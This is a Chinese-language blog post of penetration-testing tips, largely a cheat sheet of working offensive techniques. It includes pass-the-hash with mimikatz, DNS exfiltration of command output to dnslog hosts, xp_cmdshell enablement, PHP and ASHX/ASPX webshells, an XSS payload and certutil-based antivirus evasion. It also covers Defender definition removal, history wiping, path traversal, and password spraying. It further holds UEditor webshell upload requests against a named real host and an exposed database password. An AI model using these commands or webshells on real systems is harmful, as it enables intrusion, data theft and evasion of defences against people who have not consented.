一些日常小tips

tips

搜索引擎语法:https://blog.csdn.net/weixin_45116657/article/details/102761464

CVE-2020-14386: Linux kernel权限提升漏洞 :

内核提权漏洞,poc:https://www.openwall.com/lists/oss-security/2020/09/03/3

php imap命令执行:imap_open调用rsh连接远程,但是debain默认使用ssh,ssh存在-o雕鹰系统命令,因此存在命令注入。

image-20201012131444039

各种waf:https://mp.weixin.qq.com/s/PWkqNsygi-c_S7tW1y_Hxw

excel导入打xxe

https://xz.aliyun.com/t/3741

启动apache

/etc/init.d/apache2 start

ssh软连接

https://www.jozxing.cc/archives/1653

apache shiro

https://www.cnblogs.com/nul1/p/12827021.html

提权合集

https://mp.weixin.qq.com/s/gijFjloNrEshsSaiMHr8oQ

jwt

https://xz.aliyun.com/t/6776#toc-10

winrm 执行命令、端口复用

https://blog.csdn.net/k8gege/article/details/106442655

红队工具

https://github.com/root-tools/redtool

pth+rdp

https://www.dazhuanlan.com/2020/01/18/5e22c1493adef/

1
2
privilege::debug
sekurlsa::pth /user:administrator /domain:. /ntlm:xxxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin"
1
2
3
条件:
Server需要开启Restricted Admin mode
Windows 7 和 Windows Server 2008 R2默认不支持,需要安装补丁28719972973351

开启Restricted Admin mode:

1
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

设备默认口令

http://www.srxh1314.com/mrkl.html

ue上传

https://zhuanlan.zhihu.com/p/42888106

无回显外带

1
2
3
4
5
cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.b9530dbeff7692920356.d.zhack.ca && nslookup !FINAL!"



for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.bm21t3.dnslog.cn

pth + rdp

1
sekurlsa::pth /user:administrator /domain:. /ntlm:xxxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin"

清除日志

img

linux提权:

https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651102317&idx=1&sn=0b0a840bd30896eb28b02ac117700bad&chksm=bd1f0ee68a6887f00b1bfbf8996d516abfed498e264561e4d022de359beacb96efe10c000733&scene=132#wechat_redirect

mssql cmd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
-- 判断用户
and 1=(select IS_SRVROLEMEMBER('public') )--
and 1=(select IS_SRVROLEMEMBER('sysadmin') )--
and 1=(select IS_SRVROLEMEMBER('db_owner') )--

-- 开启xp_cmdshell
EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

EXEC master..xp_cmdshell '123.zpu2he.dnslog.cn'

-- RECONFIGURE报错的话就用
reconfigure with override

mysqldump

1
mysqldump --defaults-extra-file=/tmp/11.cnf --databases jiebei_com >/home/www/jb.com/runtime/log/202010/jiebei_com.sql
1
2
3
4
5
6
7
[client]
port = 3306
socket = /tmp/mysql.sock
default-character-set = utf8mb4
host = 127.0.0.1
user = 'jiebei_com'
password = 'k7SHT62npa3j8RrS'

SimplyEmail

1
./SimplyEmail.py -all -v -e

xray扫描

1
2
.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output zyhy3.html
python3 lancher.py

易受攻击点

https://mp.weixin.qq.com/s/6I-Yp0A69rLr3RfruIAkhA

cisco asa任意文件读取

https://github.com/cygenta/CVE-2020-3452/blob/main/CVE-2020-3452.py

Exchange CVE-2020-17144

poc: https://srcincite.io/pocs/cve-2020-17141.py.txt

CVE-2020-16875

poc: https://srcincite.io/pocs/cve-2020-16875.py.txt

citrix xenmobile任意文件读取

1
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

vmware文件读取:

https://twitter.com/ptswarm/status/1316016337550938122

内网不出网

https://mp.weixin.qq.com/s/IeH06p7pkQ3lmOehGLUWLg

dnscat

mysql 8.0新特性

  • table:

    1
    TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

img

  • value: 

    1
    select * from users where id = 1 union values row(1,2,3)

当php system没有调用cmd权限

通过建立新的com对象调用其他的cmd.exe

1
2
3
4
5
6
7
8
<?php
$command=$_POST[a];
$wsh = new COM('WScript.shell');   // 生成一个COM对象
$exec = $wsh->exec('cmd.exe /c '.$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput
?>

xss payload

1
<%00EEEE<svg /\/\//ONLoad='a\u006c\u0065\u0072\u0074(1)'/\/\/\>svg>%0APayload

通过certutil进行编码解码文件bypass杀软

1
2
3
4
5
6
7
8
# 编码
Certutil -encode d:\artifact.exe d:\artifact.txt

# 写入
echo sfAFASFAsfasgasdf………>>d:\1.txt

# 解码
Certutil -decode d:\art.txt d:\art.exe

关闭defender

1
2
3
4
5
6
7
8
9
10
11
12
13

C:\PROGRA~1\WINDOW~1>MpCmdRun.exe -RemoveDefinitions -all
MpCmdRun.exe -RemoveDefinitions -all

Service Version: 4.18.1812.3
Engine Version: 1.1.17600.5
AntiSpyware Signature Version: 1.327.2026.0
AntiVirus Signature Version: 1.327.2026.0
NRI Engine Version: 1.1.17600.5
NRI Signature Version: 1.327.2026.0

Starting engine and signature rollback to none...
Done!

站库分离操作内容

  • mysql

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    select @@hostname;                                 //服务端主机名称
    select * from information_schema.PROCESSLIST;      //客户端主机名称和端口

    select load_file('C:/Windows/System32/drivers/etc/hosts');   //读取文件
    /etc/hosts
    /etc/apache2/apache2.conf
    /etc/httpd/conf/httpd.conf
    /etc/udev/rules.d/70-persistent-net.rules          //获取网卡名称
    /etc/network/interfaces                            //DHCP或静态IP
    /var/lib/dhclient/dhclient--网卡.lease             //DHCP
    /etc/sysconfig/network-scripts/ifcfg-网卡          //静态IP
    C:/Windows/System32/drivers/etc/hosts
    C:/Windows/system32/inetsrv/MetaBase.xml
    C:/Windows/System32/inetsrv/config/applicationHost.config
    C:/phpStudy/Apache/conf/httpd.conf
    C:/phpStudy/Apache/conf/vhosts.conf
    C:/phpStudy/PHPTutorial/Apache/conf/httpd.conf
    C:/phpStudy/PHPTutorial/Apache/conf/vhosts.conf
    C:/phpStudy/PHPTutorial/nginx/conf/nginx.conf
    C:/phpStudy/PHPTutorial/nginx/conf/vhosts.conf

  • mssql

    1
    2
    3
    4
    5
    6
    select host_name();                       //客户端主机名称
    select @@servername;                      //服务端主机名称
    select serverproperty('MachineName');     //服务端主机名称

    select name from master.sys.sysdatabases;    //查看连接到数据库的机器名
    select * from master.sys.sysprocesses where dbid= db_id('sqlinject');

  • 模拟令牌

    1
    2
    3
    4
    只要有主机在使用Windows身份验证连接到这台数据库服务器的MSSQL时就会保留当前登录用户的令牌,而大多数人又都是以默认Administrator管理员来安装的MSSQL,所以能够直接获取到Administrator令牌。

    # msf
    meterpreter > use Incognito

ashx webshell

  • 会自己生成一个aspx webshell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<%@ WebHandler Language="C#" Class="Handler" %> 
using System; 
using System.Web; 
using System.IO; 
public class Handler : IHttpHandler { 
    public void ProcessRequest (HttpContext context) { 
        context.Response.ContentType = "text/plain"; 
        string show="<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"chopper\"],\"unsafe\");%>"; 
        StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx")); 
        file1.Write(show); 
        file1.Flush(); 
        file1.Close(); 
    } 
    public bool IsReusable { 
        get { 
            return false; 
        } 
    } 
}

ssh 反向端口转发

1
ssh -R 0.0.0.0:rport:localhost:lport root@x.x.x.x

禁用theme主题

1
<%@ Page Language="Jscript" EnableTheming = "False" StylesheetTheme="" Theme="" %>

ue不出网利用

  • 上传本地

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    POST /ueditor/net/controller.ashx?action=uploadimage HTTP/1.1
    Host: pmp.csc.com.cn
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------19350128512434
    Content-Length: 199

    -----------------------------19350128512434
    Content-Disposition: form-data; name="upfile"; filename="delicious.png"
    Content-Type: image/png

    123
    -----------------------------19350128512434--

  • 抓取本地图片写入webshell

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1
    Host: pmp.csc.com.cn
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 99

    source%5B%5D=http://127.0.0.1/App_Upload/ueditor/image/20210116/6374641084286323059465749.png?.html
    • 如果不成就换几个端口试试

常见web系统弱口令

http://uuzdaisuki.com/2020/11/09/%E5%B8%B8%E8%A7%81web%E7%B3%BB%E7%BB%9F%E9%BB%98%E8%AE%A4%E5%8F%A3%E4%BB%A4%E6%80%BB%E7%BB%93/

域外枚举以及爆破

https://github.com/3gstudent/pyKerbrute

  • EnumADUser.py

    1
    python2 EnumADUser.py 192.168.60.1 test.com user.txt tcp

    Image

  • ADPwdSpray.py

    1
    python2 ADPwdSpray.py 192.168.60.1 hacke.testlab user.txt clearpassword QWE123!@# tcp

    Image

    1
    python2 ADPwdSpray.py 192.168.60.1 hacke.testlab user.txt ntlmhash 35c83173a6fb6d142b0359381d5cc84c udp

    Image

  • 查看.net 版本

    1
    dir %WINDIR%\Microsoft.Net\Framework

  • zimbra 导出邮件

    1
    ./zmmailbox -z -m username getRestURL "//?fmt=tgz&query=after:05/10/2022"> katiana.tgz

  • adexploer导出dat

    1
    ADExplorer.exe -accepteula -snapshot "192.168.1.100" xxx.dat

  • linux不记录历史

    1
    unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

  • 查找文件

    1
    2
    3
    4
    C:\Users\the131> cd/
    C:\Users the131> dir /b/s password.txt
    C:\Users\the131> dir /b/s config.*
    C:\Users\thel31> findstr /si password *.xml *.ini *.txt45C:\Users thel3l> findstr /si login *.xml *.ini *.txt
Web
Tips Web

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!